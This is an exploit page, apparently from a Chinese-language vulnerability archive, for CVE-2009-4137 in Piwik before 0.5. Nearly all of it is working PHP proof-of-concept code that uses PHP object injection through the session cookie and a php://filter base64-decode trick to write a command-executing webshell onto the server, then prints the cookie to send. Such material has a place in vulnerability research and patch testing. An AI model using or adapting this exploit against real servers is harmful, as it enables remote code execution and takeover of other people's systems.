CVE-2009-4137 Piwik before 0.5 任意代碼執行/文件上傳漏洞

EXP

<?php
/*
We exploit the CVE-2009-4137 by using a php object injection of a Piwik_Config object
The __destruct() function of this object writes the config to the path specified in the pathIniFileUserConfig variable
The content of a config file is always prepended by a php showstopper as seen in the following two code-lines of Config.php

$configFile = "; <?php exit; ?> DO NOT REMOVE THIS LINE\n";
$configFile .= "; file automatically generated or modified by Piwik; you can manually override the default values in global.ini.php by redefining them in this file.\n";

To circumvent this, we use php://filter/write=convert.base64-decode and pre-encode our payload. PHP is nice enough to just skip every character that is not part of the base64 alphabet

We then prepend a single character to correct the padding to our payload and write a simple php webshell.
A request to the piwik server with the cookie then triggers the exploit

(You need to url_encode the Cookie if you use manual requests. The '+' and '/' characters of the base64 alphabet must be encoded)
*/

class Zend_Config {
    protected $_data = array(
        "login" => "root",
        "password" => "rootroot",
        "email" => "[email protected]"
    );
}

class Piwik_Config {
    protected $configFileUpdated = true;
    protected $doWriteFileWhenUpdated = true;
    protected $correctCwd = ".";
    protected $pathIniFileUserConfig = "php://filter/write=convert.base64-decode/resource=/var/www/piwik/webshell.php";
    protected $userConfig = array();

    function __construct() { // 'a' for padding
	$this->userConfig["a".base64_encode('<?php system($_GET[\'cmd\']); ?>'."\n")] = new Zend_Config;
    }
}

$b64 = base64_encode(serialize(new Piwik_Config));
$urlEncoded = urlencode($b64);
echo "Use this cookie";
echo "PIWIK_SESSID=".$urlEncoded."\n";

?>